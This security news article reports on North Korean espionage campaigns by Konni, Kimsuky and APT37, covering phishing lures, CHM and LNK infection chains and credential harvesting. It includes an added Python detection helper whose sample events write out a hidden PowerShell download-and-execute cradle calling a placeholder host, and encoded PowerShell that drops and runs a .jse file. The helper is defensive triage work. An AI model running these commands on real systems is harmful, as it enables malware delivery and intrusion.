The North Korea-linked threat actor known as Konni APT has been attributed to a phishing campaign targeting government entities in Ukraine, indicating that the group's targeting now extends beyond Russia.
Enterprise security firm Proofpoint said the end goal of the campaign is to collect intelligence on the "trajectory of the Russian invasion."
"The group's interest in Ukraine follows historical targeting of government entities in Russia for strategic intelligence gathering purposes," security researchers Greg Lesnewich, Saher Naumaan, and Mark Kelly said in a report shared with The Hacker News.
Konni APT, also known as Opal Sleet, Osmium, TA406, and Vedalia, is a cyber espionage group with a history of targeting entities in South Korea, the United States, and Russia. It has been operational since at least 2014.
Attack chains mounted by the threat actor often involve phishing emails that distribute malware known as Konni RAT (aka UpDog) or redirect recipients to credential harvesting pages. Proofpoint, in an analysis of the group published in November 2021, assessed TA406 to be one of several actors that make up the activity publicly tracked as Kimsuky, Thallium, and Konni Group.
The latest set of attacks documented by the cybersecurity company involves phishing emails that impersonate a fictitious senior fellow at a think tank called the Royal Institute of Strategic Studies, which is itself a non-existent organization.
The email messages contain a link to a password-protected RAR archive hosted on the MEGA cloud service. Opening the RAR archive with the password supplied in the message body launches an infection sequence engineered to conduct extensive reconnaissance of the compromised machine. The password-protected archive is a familiar evasion step: the encrypted contents cannot be scanned by the mail gateway or the cloud host, so the lure depends on the recipient typing the password in.
Specifically, the RAR archive contains a CHM file that displays decoy content related to former Ukrainian military chief Valeriy Zaluzhnyi. Should the victim click anywhere on the page, a PowerShell command embedded in the HTML is executed to reach out to an external server and download a next-stage PowerShell payload.
The newly launched PowerShell script is capable of executing various commands to gather information about the system, encode the output using Base64, and send it to the same server.
"The actor sent multiple phishing emails on consecutive days when the target did not click the link, asking the target if they had received the prior emails and if they could download the files," the researchers said.
Proofpoint said it also observed an HTML file being distributed directly as an attachment to the phishing messages. In this variation of the attack, the victim is instructed to click an embedded link within the HTML file, resulting in the download of a ZIP archive that includes a benign PDF and a Windows shortcut (LNK) file.
When the LNK is run, it executes Base64-encoded PowerShell to drop a JScript Encoded (JSE) file named "Themes.jse" using a Visual Basic Script. The JSE malware, in turn, contacts an attacker-controlled URL and runs the server's response via PowerShell. The exact nature of that payload is currently not known.
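Both chains above (the CHM lure that launches a PowerShell download cradle, and the LNK that runs Base64-encoded PowerShell to drop a .jse and hand it to a script host) leave the same trace in endpoint telemetry: a powershell.exe process-creation event whose parent and command line are out of place. The triage helper below is an added example written for this article, not Proofpoint's tooling or anything recovered from the actor; it decodes `-EncodedCommand` arguments (PowerShell expects Base64 over UTF-16LE, which is why naive UTF-8 decoding of such blobs yields garbage), strips the blob before pattern matching so Base64 noise cannot trigger false hits, and scores the indicators the article describes, including the scheduled-task persistence mentioned in the Kimsuky section later. All log records, hostnames and paths in it are constructed placeholders.

```python
"""
Added triage example (not Proofpoint's or the reported actor's code): decode
PowerShell -EncodedCommand arguments from process-creation events and flag the
cradle, script-host and persistence indicators described in the article.
All events below are constructed sample data; domains and paths are placeholders.
"""
import base64
import re
from typing import Optional

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -en, -enc).
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Behavioural indicators drawn from the attack chains in the text.
INDICATORS = {
    "download_cradle": re.compile(r"(?i)Invoke-WebRequest|\biwr\b|\birm\b|Invoke-RestMethod|DownloadString|DownloadFile|Net\.WebClient"),
    "exec_remote_response": re.compile(r"(?i)\biex\b|Invoke-Expression"),
    "script_host_drop": re.compile(r"(?i)[wc]script\.exe|\.jse\b|\.vbs\b"),
    "evasion_switches": re.compile(r"(?i)-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|-(?:ep|executionpolicy)\s+bypass"),
    "scheduled_task": re.compile(r"(?i)schtasks|Register-ScheduledTask|New-ScheduledTaskAction"),
    "base64_collection": re.compile(r"(?i)ToBase64String"),
}

# Parents that should rarely spawn PowerShell; hh.exe is the HTML Help viewer that renders CHM lures.
RISKY_PARENTS = {"hh.exe", "wscript.exe", "cscript.exe", "winword.exe", "excel.exe", "outlook.exe"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Score one process-creation event; returns decoded script, indicator hits, score and verdict."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    parent = event.get("parent", "").lower()
    # Match against the command line with the Base64 blob removed, plus the decoded script,
    # so random Base64 characters never satisfy a word-boundary pattern such as \biex\b.
    haystack = ENC_RE.sub(" ", cmdline)
    if decoded is not None:
        haystack += "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    score = len(hits) + (1 if parent in RISKY_PARENTS else 0)
    # An encoded command is a signal on its own only from explorer.exe (the LNK double-click
    # path) or a risky parent; administrators legitimately use -enc from cmd.exe and tooling.
    if decoded is not None and parent in RISKY_PARENTS | {"explorer.exe"}:
        score += 1
    return {"decoded": decoded, "hits": hits, "score": score,
            "verdict": "alert" if score >= 2 else "info"}


def _encode_ps(script: str) -> str:
    """Build a sample -EncodedCommand value the way powershell.exe expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events modelled on the chains in the article (placeholder domain, not real C2).
SAMPLE_EVENTS = [
    # CHM lure: hh.exe spawns a hidden PowerShell download cradle for the next stage.
    {"parent": "hh.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"iex (New-Object Net.WebClient)"
                ".DownloadString('http://stage.example.invalid/next.ps1')\""},
    # LNK lure: explorer.exe spawns encoded PowerShell that writes a .jse and runs it via wscript.
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ep bypass -enc "
                + _encode_ps('$p="$env:APPDATA\\Themes.jse"; Set-Content $p $s; wscript.exe $p')},
    # Benign administrative use from an interactive shell.
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service -Name Spooler"},
]


def triage_all(events=SAMPLE_EVENTS) -> list:
    return [triage(e) for e in events]


if __name__ == "__main__":
    for e, r in zip(SAMPLE_EVENTS, triage_all()):
        print(f"{r['verdict']:5} score={r['score']} parent={e['parent']:12} hits={','.join(r['hits']) or '-'}")
```

The parent-process test matters as much as the command-line patterns: the same `-enc` blob launched from a deployment tool is routine, while launched from hh.exe, a script host or an Office application it is almost never legitimate. Sysmon Event ID 1 or any EDR process-creation feed supplies the parent, image and command line fields the sample events use.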
Additionally, TA406 has been observed attempting to harvest credentials by sending fake Microsoft security alert messages to Ukrainian government entities from ProtonMail accounts, warning them of suspicious sign-in activity from IP addresses located in the United States and urging them to verify the login by visiting a link.
While the credential harvesting page has not been recovered, the same compromised domain is said to have been used in the past to collect Naver login information.
"These credential harvesting campaigns took place prior to the attempted malware deployments and targeted some of the same users later targeted with the HTML delivery campaign," Proofpoint said. "TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments."
"Unlike Russian groups who have likely been tasked with gathering tactical battlefield information and targeting of Ukrainian forces in situ, TA406 has typically focused on more strategic, political intelligence collection efforts."
Figure: Kimsuky attack chain targeting South Korea
The disclosure comes as the Konni group has been linked to a sophisticated multi-stage malware campaign targeting entities in South Korea with ZIP archives containing LNK files, which run PowerShell scripts to extract a CAB archive and ultimately deliver batch script malware capable of collecting sensitive data and exfiltrating it to a remote server.
The findings also dovetail with spear-phishing campaigns orchestrated by Kimsuky to target government agencies in South Korea by delivering a stealer malware capable of establishing command-and-control (C2 or C&C) communications and exfiltrating files, web browser data, and cryptocurrency wallet information.
Figure: Kimsuky attack chain delivering PEBBLEDASH
According to South Korean cybersecurity company AhnLab, Kimsuky has also been observed propagating PEBBLEDASH as part of a multi-stage infection sequence initiated via spear-phishing. The trojan was attributed by the U.S. government to the Lazarus Group in May 2020.
"While the Kimsuky group uses various types of malware, in the case of PEBBLEDASH, they execute malware based on an LNK file via spear-phishing in the initial access stage to launch their attacks," it said.
"They then utilize a PowerShell script to create a task scheduler and register it for automatic execution. Through communication with a Dropbox and TCP socket-based C&C server, the group installs multiple malware and tools including PEBBLEDASH."
Konni and Kimsuky are far from the only North Korean threat actors to focus on Seoul. As recently as March 2025, South Korean entities were found to be on the receiving end of another campaign carried out by APT37, which is also known as ScarCruft.
Dubbed Operation ToyBox Story, the spear-phishing attacks singled out several activists focused on North Korea, per the Genians Security Center (GSC). The first observed spear-phishing attack occurred on March 8, 2025.
"The email contained a Dropbox link leading to a compressed archive that included a malicious shortcut (LNK) file," the South Korean company said. "When extracted and executed, the LNK file activated additional malware containing the keyword 'toy.'"
Figure: APT37 Operation ToyBox Story attack chain
The LNK files are configured to launch a decoy HWP file and run PowerShell commands, leading to the execution of files named toy03.bat, toy02.bat, and toy01.bat (in that order), the last of which contains shellcode to launch RokRAT, a staple malware associated with APT37.
RokRAT is equipped to collect system information, capture screenshots, and use three different cloud services, pCloud, Yandex, and Dropbox, for C2, so its beacons blend into ordinary outbound traffic to legitimate file-sharing providers.
"The threat actors exploited legitimate cloud services as C2 infrastructure and continued to modify shortcut (LNK) files while focusing on fileless attack techniques to evade detection by antivirus software installed on target endpoints," Genians said.